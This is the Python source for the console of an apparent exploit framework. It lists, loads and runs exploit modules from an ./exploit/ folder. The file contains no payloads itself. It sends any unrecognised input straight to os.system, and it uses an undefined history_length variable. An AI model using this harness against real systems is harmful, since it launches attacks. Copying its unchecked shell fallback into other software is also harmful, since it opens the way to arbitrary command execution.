#!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from core.banner import banner 5 | from core.log import Log 6 | from core.log import color 7 | 8 | import sys 9 | import string 10 | import os 11 | import hashlib 12 | import readline 13 | import code 14 | import atexit 15 | import json 16 | import time 17 | import signal 18 | import importlib 19 | 20 | def setup(): 21 | history_file = "./.history" 22 | if not os.path.exists(history_file): 23 | open(history_file, 'a+').close() 24 | 25 | readline.read_history_file(history_file) 26 | readline.set_history_length(history_length) 27 | atexit.register(readline.write_history_file, history_file) 28 | 29 | readline.parse_and_bind('set enable-keypad on') 30 | 31 | readline.set_completer(complete) 32 | readline.set_completer_delims(' \t\n;') 33 | readline.parse_and_bind("tab: complete") 34 | 35 | def md5(content): 36 | return hashlib.md5(content).hexdigest() 37 | 38 | def show_help(): 39 | print("Usage : ") 40 | print(" python %s" % (sys.argv[0])) 41 | print("Author : ") 42 | print(" WangYihang ") 43 | print("Github : ") 44 | print(" https://github.com/wangyihang/exploit-framework") 45 | 46 | def core_commands(): 47 | print("Core Commands") 48 | print("=============") 49 | print("\tCommand\tDescription") 50 | print("\t-------\t-----------") 51 | print("\thelp\tshow help") 52 | print("\tversion\tshow version") 53 | print("\tuse\tSelects a module by name") 54 | print("\tshow\tDisplays modules of a given type, or all modules") 55 | print("\tsearch\tSearches module names and descriptions") 56 | print("\tback\tMove back from the current context") 57 | print("\tquit\tquit") 58 | print("") 59 | 60 | def module_command(): 61 | print("Module Commands") 62 | print("=============") 63 | print("\tCommand\tDescription") 64 | print("\t-------\t-----------") 65 | print("\toptions\tDisplays global options or for one or more modules") 66 | print("\tinfo\tDisplays information about one or more modules") 67 | print("") 68 | 69 | def main_help(): 70 | core_commands() 71 | module_command() 72 | 73 | def signal_handler(ignum, frame): 74 | print("") 75 | Log.Log.info("Enter : 'q|quit|exit' to shutdown the program!") 76 | 77 | def reset_context(): 78 | return "Framework" 79 | 80 | def main(): 81 | signal.signal(signal.SIGINT, signal_handler) 82 | signal.signal(signal.SIGTERM, signal_handler) 83 | banner.banner() 84 | 85 | LOCAL_COMMAND_FLAG = True 86 | 87 | CONTEXT = reset_context() 88 | while True: 89 | command = (input("[%s]=> " % (color.red(CONTEXT))) or "help") 90 | if command == "h" or command == "help" or command == "?": 91 | main_help() 92 | elif command == "version": 93 | Log.Log.info("Version: 0.0.1") 94 | elif command == "show": 95 | print("%s" % (color.purple("------\t\t------"))) 96 | print("%s" % (color.purple("Vendor\t\tModule"))) 97 | print("%s" % (color.purple("------\t\t------"))) 98 | exploit_path = "./exploit/" 99 | vendors = os.listdir(exploit_path) 100 | for vendor in vendors: 101 | full_path = exploit_path + vendor 102 | if os.path.isdir(full_path): 103 | # Log.Log.info("%s" % ("-" * 0x20)) 104 | # Log.Log.info("Vendor: %s" % (vendor)) 105 | exploit_files = os.listdir(full_path) 106 | number = 0 107 | for exploit_file in exploit_files: 108 | if exploit_file.endswith(".py") and exploit_file != "__init__.py": 109 | # Log.Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", ""))) 110 | if len(vendor) > 8: 111 | print("%s" % (color.cyan("%s\t%s" % (vendor, exploit_file.replace(".py", ""))))) 112 | else: 113 | print("%s" % (color.cyan("%s\t\t%s" % (vendor, exploit_file.replace(".py", ""))))) 114 | number += 1 115 | # Log.Log.info("%d exploits" % (number)) 116 | print("%s" % (color.purple("---------"))) 117 | print("%s" % (color.purple(" Example"))) 118 | print("%s" % (color.purple("---------"))) 119 | print("%s" % (color.cyan("use exploit.%s.%s" % (vendor, exploit_file.replace(".py", ""))))) 120 | elif command.startswith("use "): 121 | module_name = command.split(" ")[1] 122 | Log.Log.info("Loading module: %s" % (module_name)) 123 | try: 124 | module = importlib.import_module(module_name) 125 | except Exception as e: 126 | Log.Log.error(str(e)) 127 | continue 128 | CONTEXT = module_name 129 | exploit = module.Exploit() 130 | exploit.show_info() 131 | Log.Log.info("%s" % ("-" * 0x40)) 132 | exploit.show_options() 133 | while True: 134 | module_command = (input("[%s]=> " % (color.red(CONTEXT))) or "help") 135 | if module_command == "help": 136 | main_help() 137 | continue 138 | if module_command.startswith("set "): 139 | if len(module_command.split(" ")) == 3: 140 | key = module_command.split(" ")[1] 141 | value = module_command.split(" ")[2] 142 | exploit.set_config(key, value) 143 | else: 144 | Log.Log.error("Check your input!") 145 | Log.Log.info("Example: \n\tset [KEY] [VALUE]") 146 | elif module_command == "options": 147 | exploit.show_options() 148 | elif module_command == "info": 149 | exploit.show_info() 150 | elif module_command == "exploit": 151 | try: 152 | exploit.exploit() 153 | except Exception as e: 154 | Log.Log.error(str(e)) 155 | elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back": 156 | break 157 | else: 158 | main_help() 159 | CONTEXT = reset_context() 160 | elif command == "q" or command == "quit" or command == "exit": 161 | Log.Log.info("Quiting...") 162 | break 163 | else: 164 | Log.Log.error("Unsupported function!") 165 | if LOCAL_COMMAND_FLAG == True: 166 | Log.Log.info("Executing command on localhost...") 167 | os.system(command) 168 | 169 | if __name__ == "__main__": 170 | main() 171 | --------------------------------------------------------------------------------